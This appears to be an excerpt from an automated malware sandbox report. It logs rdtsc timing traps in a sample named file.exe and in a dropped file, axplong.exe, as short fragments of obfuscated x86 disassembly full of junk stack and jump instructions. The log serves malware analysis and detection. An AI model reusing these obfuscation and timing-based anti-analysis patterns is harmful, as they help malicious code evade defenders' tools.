Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CA9 second address: 5500CCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99D0D12E1Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CCE second address: 5500CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5500CDD second address: 5500CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C15 second address: 5510C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C1B second address: 5510C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C1F second address: 5510C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C2F second address: 5510C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510C35 second address: 5510C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0DE6F31h 0x00000008 call 00007F99D0DE6F30h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F99D0DE6F2Ah 0x0000001a pushfd 0x0000001b jmp 00007F99D0DE6F32h 0x00000020 or ch, 00000018h 0x00000023 jmp 00007F99D0DE6F2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551095D second address: 5510982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 004C5E77h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99D0D12E25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510982 second address: 5510988 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5510988 second address: 551098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 551098C second address: 55109BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99D0DE6F35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55109BE second address: 55109E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99D0D12E1Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5590693 second address: 5590699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5590699 second address: 559069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 559069D second address: 55906C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e mov bh, 8Dh 0x00000010 pop eax 0x00000011 mov ch, dl 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99D0DE6F2Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808E7 second address: 55808EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808EC second address: 55808FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808FA second address: 55808FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55808FE second address: 5580902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580902 second address: 5580908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580908 second address: 558090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558090E second address: 5580912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580912 second address: 5580916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558071A second address: 558071E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 558071E second address: 5580724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580724 second address: 5580797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99D0D12E20h 0x0000000f push eax 0x00000010 jmp 00007F99D0D12E1Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F99D0D12E26h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E1Eh 0x00000024 sbb al, 00000078h 0x00000027 jmp 00007F99D0D12E1Bh 0x0000002c popfd 0x0000002d mov cx, 1DAFh 0x00000031 popad 0x00000032 pop ebp 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 movzx eax, di 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580797 second address: 558079B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552001F second address: 5520025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520025 second address: 552002B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552002B second address: 5520048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99D0D12E1Dh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520048 second address: 552004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 552004C second address: 5520052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5580CB5 second address: 5580CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530484 second address: 553049A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553049A second address: 553049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553049E second address: 55304A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304A4 second address: 55304AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304AA second address: 55304AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304AE second address: 55304F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F99D0DE6F2Bh 0x00000014 and eax, 4E75759Eh 0x0000001a jmp 00007F99D0DE6F39h 0x0000001f popfd 0x00000020 pop esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55304F7 second address: 5530561 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E1Dh 0x00000008 sbb cx, 8BD6h 0x0000000d jmp 00007F99D0D12E21h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F99D0D12E1Eh 0x0000001d push FFFFFFFEh 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F99D0D12E23h 0x0000002a jmp 00007F99D0D12E23h 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530561 second address: 553057A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 12E00FE4h 0x00000010 pushad 0x00000011 mov cx, AFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bh, ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553057A second address: 5530603 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E27h 0x00000008 add cl, 0000007Eh 0x0000000b jmp 00007F99D0D12E29h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 add dword ptr [esp], 6461B034h 0x0000001b jmp 00007F99D0D12E1Eh 0x00000020 push 238EA125h 0x00000025 jmp 00007F99D0D12E21h 0x0000002a add dword ptr [esp], 53AA0CDBh 0x00000031 pushad 0x00000032 mov ebx, eax 0x00000034 call 00007F99D0D12E28h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530603 second address: 5530645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000000h] 0x0000000c pushad 0x0000000d jmp 00007F99D0DE6F2Dh 0x00000012 call 00007F99D0DE6F30h 0x00000017 pop edi 0x00000018 popad 0x00000019 nop 0x0000001a pushad 0x0000001b mov ax, 2DB9h 0x0000001f push esi 0x00000020 mov al, dl 0x00000022 pop ecx 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov ax, di 0x0000002b movsx edx, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530645 second address: 55306FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99D0D12E1Dh 0x00000008 mov ah, D3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F99D0D12E29h 0x00000015 xor cx, 4996h 0x0000001a jmp 00007F99D0D12E21h 0x0000001f popfd 0x00000020 push eax 0x00000021 pushfd 0x00000022 jmp 00007F99D0D12E27h 0x00000027 add eax, 56A9C2CEh 0x0000002d jmp 00007F99D0D12E29h 0x00000032 popfd 0x00000033 pop eax 0x00000034 popad 0x00000035 sub esp, 1Ch 0x00000038 jmp 00007F99D0D12E27h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F99D0D12E25h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55306FA second address: 553070A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99D0DE6F2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553070A second address: 5530719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530719 second address: 553071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553071D second address: 5530723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530723 second address: 5530750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F99D0DE6F30h 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99D0DE6F2Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530750 second address: 5530756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530756 second address: 553075D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553075D second address: 553076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553076B second address: 553076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553076F second address: 5530775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530775 second address: 553079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ebx, 278D5CC2h 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 push ebx 0x00000016 mov si, 7C41h 0x0000001a pop eax 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553079A second address: 553079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553079F second address: 55307B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 0F9Ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307B3 second address: 55307B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307B7 second address: 55307D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307D3 second address: 5530895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99D0D12E1Dh 0x00000009 sbb ah, 00000056h 0x0000000c jmp 00007F99D0D12E21h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [7743B370h] 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007F99D0D12E28h 0x00000024 sbb cl, FFFFFFA8h 0x00000027 jmp 00007F99D0D12E1Bh 0x0000002c popfd 0x0000002d popad 0x0000002e pushfd 0x0000002f jmp 00007F99D0D12E28h 0x00000034 xor cx, 3308h 0x00000039 jmp 00007F99D0D12E1Bh 0x0000003e popfd 0x0000003f popad 0x00000040 xor dword ptr [ebp-08h], eax 0x00000043 jmp 00007F99D0D12E26h 0x00000048 xor eax, ebp 0x0000004a pushad 0x0000004b push edi 0x0000004c pushfd 0x0000004d jmp 00007F99D0D12E1Ah 0x00000052 and al, FFFFFF98h 0x00000055 jmp 00007F99D0D12E1Bh 0x0000005a popfd 0x0000005b pop esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push ebx 0x0000005f pop ecx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530895 second address: 55308E5 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99D0DE6F2Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 call 00007F99D0DE6F37h 0x00000015 jmp 00007F99D0DE6F38h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov dword ptr [esp], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55308E5 second address: 55308EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55308EB second address: 553093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx ecx, di 0x00000011 mov si, di 0x00000014 popad 0x00000015 pushad 0x00000016 mov ax, bx 0x00000019 movsx edx, ax 0x0000001c popad 0x0000001d popad 0x0000001e mov dword ptr fs:[00000000h], eax 0x00000024 jmp 00007F99D0DE6F34h 0x00000029 mov esi, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553093C second address: 5530940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530940 second address: 5530944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530944 second address: 553094A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553094A second address: 5530969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530969 second address: 55309E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 call 00007F99D0D12E28h 0x0000000c mov ah, 45h 0x0000000e pop edx 0x0000000f popad 0x00000010 test eax, eax 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 pushfd 0x00000016 jmp 00007F99D0D12E24h 0x0000001b sub cx, FB98h 0x00000020 jmp 00007F99D0D12E1Bh 0x00000025 popfd 0x00000026 popad 0x00000027 jne 00007F9A42B22182h 0x0000002d pushad 0x0000002e movzx esi, di 0x00000031 mov ecx, edi 0x00000033 popad 0x00000034 mov eax, 00000000h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007F99D0D12E21h 0x00000041 pop esi 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309E0 second address: 55309E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309E6 second address: 55309EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55309EA second address: 5530A24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-20h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F99D0DE6F37h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A24 second address: 5530A7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0D12E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b pushad 0x0000000c mov si, 0473h 0x00000010 pushfd 0x00000011 jmp 00007F99D0D12E28h 0x00000016 add eax, 329CAF78h 0x0000001c jmp 00007F99D0D12E1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [ebp-24h], ebx 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A7C second address: 5530A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530A80 second address: 5530B0C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99D0D12E20h 0x00000008 sbb cl, FFFFFFD8h 0x0000000b jmp 00007F99D0D12E1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 jmp 00007F99D0D12E1Fh 0x00000019 pop ecx 0x0000001a popad 0x0000001b test ebx, ebx 0x0000001d jmp 00007F99D0D12E1Fh 0x00000022 je 00007F9A42B21FCCh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, 4426h 0x0000002f pushfd 0x00000030 jmp 00007F99D0D12E27h 0x00000035 xor cx, 96AEh 0x0000003a jmp 00007F99D0D12E29h 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B0C second address: 5530B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B12 second address: 5530B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530B16 second address: 5530B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 26EA6B second address: 26EA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: 26EA71 second address: 26EA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99D0DE6F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F99D0DE6F26h 0x00000017 popad 0x00000018 rdtsc
